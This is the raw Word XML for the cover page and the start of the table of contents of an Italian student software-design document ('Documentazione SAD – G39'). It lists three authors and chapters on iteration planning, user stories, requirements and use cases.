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6692614"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Cover Pages"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="3FB42363" w14:textId="6628F4A7" w:rsidR="005E6C0F" w:rsidRPr="00715086" w:rsidRDefault="005E6C0F"/>
        <w:p w14:paraId="1FF87564" w14:textId="1C46488D" w:rsidR="005E6C0F" w:rsidRPr="00715086" w:rsidRDefault="005E6C0F">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
              <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
              <w:kern w:val="0"/>
              <w:sz w:val="52"/>
              <w:szCs w:val="52"/>
              <w:lang w:eastAsia="it-IT"/>
              <w14:ligatures w14:val="none"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00715086">
            <mc:AlternateContent>
              <mc:Choice Requires="wps">
                <w:drawing>
                  <wp:anchor distT="0" distB="0" distL="182880" distR="182880" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30639409" wp14:editId="50A92C2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273040" cy="6720840"/>
                    <wp:effectExtent l="0" t="0" r="3810" b="11430"/>
                    <wp:wrapSquare wrapText="bothSides"/>
                    <wp:docPr id="131" name="Casella di testo 34"/>
                    <wp:cNvGraphicFramePr/>
                    <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                      <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                        <wps:wsp>
                          <wps:cNvSpPr txBox="1"/>
                          <wps:spPr>
                            <a:xfrm>
                              <a:off x="0" y="0"/>
                              <a:ext cx="52730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75524" w14:textId="4FE9CD62" w:rsidR="005E6C0F" w:rsidRPr="00715086" w:rsidRDefault="00000000" w:rsidP="005E6C0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5E6C0F" w:rsidRPr="00715086">
                                      <w:rPr>
                                        <w:color w:val="4472C4" w:themeColor="accent1"/>
                                        <w:sz w:val="72"/>
                                        <w:szCs w:val="72"/>
                                      </w:rPr>
                                      <w:t>Documentazione SAD – G</w:t>
                                    </w:r>
                                    <w:r w:rsidR="001D41D7" w:rsidRPr="00715086">
                                      <w:rPr>
                                        <w:color w:val="4472C4" w:themeColor="accent1"/>
                                        <w:sz w:val="72"/>
                                        <w:szCs w:val="72"/>
                                      </w:rPr>
                                      <w:t>39</w:t>
                                    </w:r>
                                  </w:sdtContent>
                                </w:sdt>
                              </w:p>
                              <w:p w14:paraId="3F3A1EDE" w14:textId="77B79459" w:rsidR="005E6C0F" w:rsidRPr="00715086" w:rsidRDefault="005E6C0F" w:rsidP="005E6C0F">
                                <w:pPr>
                                  <w:pStyle w:val="Nessunaspaziatura"/>
                                  <w:spacing w:before="80" w:after="40"/>
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                </w:pPr>
                                <w:r w:rsidRPr="00715086">
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t>Francesco Cirillo</w:t>
                                </w:r>
                                <w:r w:rsidRPr="00715086">
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:tab/>
                                </w:r>
                                <w:r w:rsidRPr="00715086">
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:tab/>
                                  <w:t>M630</w:t>
                                </w:r>
                                <w:r w:rsidR="001D41D7" w:rsidRPr="00715086">
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:t>01491</w:t>
                                </w:r>
                                <w:r w:rsidRPr="00715086">
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:br/>
                                  <w:t>Angelo Barletta</w:t>
                                </w:r>
                                <w:r w:rsidRPr="00715086">
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:tab/>
                                </w:r>
                                <w:r w:rsidRPr="00715086">
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:tab/>
                                  <w:t>M63001507</w:t>
                                </w:r>
                                <w:r w:rsidRPr="00715086">
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:br/>
                                  <w:t>Giuseppe Buonomano</w:t>
                                </w:r>
                                <w:r w:rsidRPr="00715086">
                                  <w:rPr>
                                    <w:caps/>
                                    <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                                    <w:sz w:val="24"/>
                                    <w:szCs w:val="24"/>
                                  </w:rPr>
                                  <w:tab/>
                                  <w:t>M630015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0639409" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                    <v:stroke joinstyle="miter"/>
                    <v:path gradientshapeok="t" o:connecttype="rect"/>
                  </v:shapetype>
                  <v:shape id="Casella di testo 34" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:0;width:415.2pt;height:529.2pt;z-index:251663360;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" filled="f" stroked="f" strokeweight=".5pt">
                    <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                      <w:txbxContent>
                        <w:p w14:paraId="48675524" w14:textId="4FE9CD62" w:rsidR="005E6C0F" w:rsidRPr="00715086" w:rsidRDefault="00000000" w:rsidP="005E6C0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5E6C0F" w:rsidRPr="00715086">
                                <w:rPr>
                                  <w:color w:val="4472C4" w:themeColor="accent1"/>
                                  <w:sz w:val="72"/>
                                  <w:szCs w:val="72"/>
                                </w:rPr>
                                <w:t>Documentazione SAD – G</w:t>
                              </w:r>
                              <w:r w:rsidR="001D41D7" w:rsidRPr="00715086">
                                <w:rPr>
                                  <w:color w:val="4472C4" w:themeColor="accent1"/>
                                  <w:sz w:val="72"/>
                                  <w:szCs w:val="72"/>
                                </w:rPr>
                                <w:t>39</w:t>
                              </w:r>
                            </w:sdtContent>
                          </w:sdt>
                        </w:p>
                        <w:p w14:paraId="3F3A1EDE" w14:textId="77B79459" w:rsidR="005E6C0F" w:rsidRPr="00715086" w:rsidRDefault="005E6C0F" w:rsidP="005E6C0F">
                          <w:pPr>
                            <w:pStyle w:val="Nessunaspaziatura"/>
                            <w:spacing w:before="80" w:after="40"/>
                            <w:rPr>
                              <w:caps/>
                              <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="00715086">
                            <w:rPr>
                              <w:caps/>
                              <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t>Francesco Cirillo</w:t>
                          </w:r>
                          <w:r w:rsidRPr="00715086">
                            <w:rPr>
                              <w:caps/>
                              <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:tab/>
                          </w:r>
                          <w:r w:rsidRPr="00715086">
                            <w:rPr>
                              <w:caps/>
                              <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:tab/>
                            <w:t>M630</w:t>
                          </w:r>
                          <w:r w:rsidR="001D41D7" w:rsidRPr="00715086">
                            <w:rPr>
                              <w:caps/>
                              <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:t>01491</w:t>
                          </w:r>
                          <w:r w:rsidRPr="00715086">
                            <w:rPr>
                              <w:caps/>
                              <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:br/>
                            <w:t>Angelo Barletta</w:t>
                          </w:r>
                          <w:r w:rsidRPr="00715086">
                            <w:rPr>
                              <w:caps/>
                              <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:tab/>
                          </w:r>
                          <w:r w:rsidRPr="00715086">
                            <w:rPr>
                              <w:caps/>
                              <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:tab/>
                            <w:t>M63001507</w:t>
                          </w:r>
                          <w:r w:rsidRPr="00715086">
                            <w:rPr>
                              <w:caps/>
                              <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:br/>
                            <w:t>Giuseppe Buonomano</w:t>
                          </w:r>
                          <w:r w:rsidRPr="00715086">
                            <w:rPr>
                              <w:caps/>
                              <w:color w:val="5B9BD5" w:themeColor="accent5"/>
                              <w:sz w:val="24"/>
                              <w:szCs w:val="24"/>
                            </w:rPr>
                            <w:tab/>
                            <w:t>M63001506</w:t>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </v:textbox>
                    <w10:wrap type="square" anchorx="margin" anchory="page"/>
                  </v:shape>
                </w:pict>
              </mc:Fallback>
            </mc:AlternateContent>
          </w:r>
          <w:r w:rsidRPr="00715086">
            <w:rPr>
              <w:sz w:val="52"/>
              <w:szCs w:val="52"/>
            </w:rPr>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:id w:val="-1532725268"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="539CEC27" w14:textId="090E5E49" w:rsidR="001D3178" w:rsidRPr="00715086" w:rsidRDefault="005C50CF">
          <w:pPr>
            <w:pStyle w:val="Titolosommario"/>
            <w:rPr>
              <w:sz w:val="60"/>
              <w:szCs w:val="60"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00715086">
            <w:rPr>
              <w:sz w:val="60"/>
              <w:szCs w:val="60"/>
            </w:rPr>
            <w:t>Sommario</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="68AE9B7B" w14:textId="2795B141" w:rsidR="007C4C90" w:rsidRDefault="001D3178">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00715086">
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00715086">
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00715086">
            <w:rPr>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc148195717" w:history="1">
            <w:r w:rsidR="007C4C90" w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1 Introduzione</w:t>
            </w:r>
            <w:r w:rsidR="007C4C90">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007C4C90">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007C4C90">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195717 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007C4C90">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007C4C90">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="007C4C90">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D8FB845" w14:textId="78DC8335" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195718" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1 Approccio adottato</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195718 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D9CE8D6" w14:textId="7C56E274" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195719" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2 Iteration Planning</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195719 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="679D354D" w14:textId="57A4D19D" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195720" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2 Specifica dei Requisiti</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195720 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1512C9D4" w14:textId="4BF874EF" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195721" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1 Storie Utente</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195721 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0CD5915A" w14:textId="553CFC20" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195722" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2 Requisiti funzionali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195722 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7835DA2C" w14:textId="094EED3D" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195723" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.3 Requisiti non funzionali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195723 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44FFB7D4" w14:textId="162ED78E" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195724" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.4 Requisiti sui dati</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195724 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="213C24F2" w14:textId="6B3C4932" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195725" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.5 Diagramma dei casi d’uso</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195725 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1B622518" w14:textId="263BED2D" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195726" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.6 Scenari dei casi d’uso</w:t>
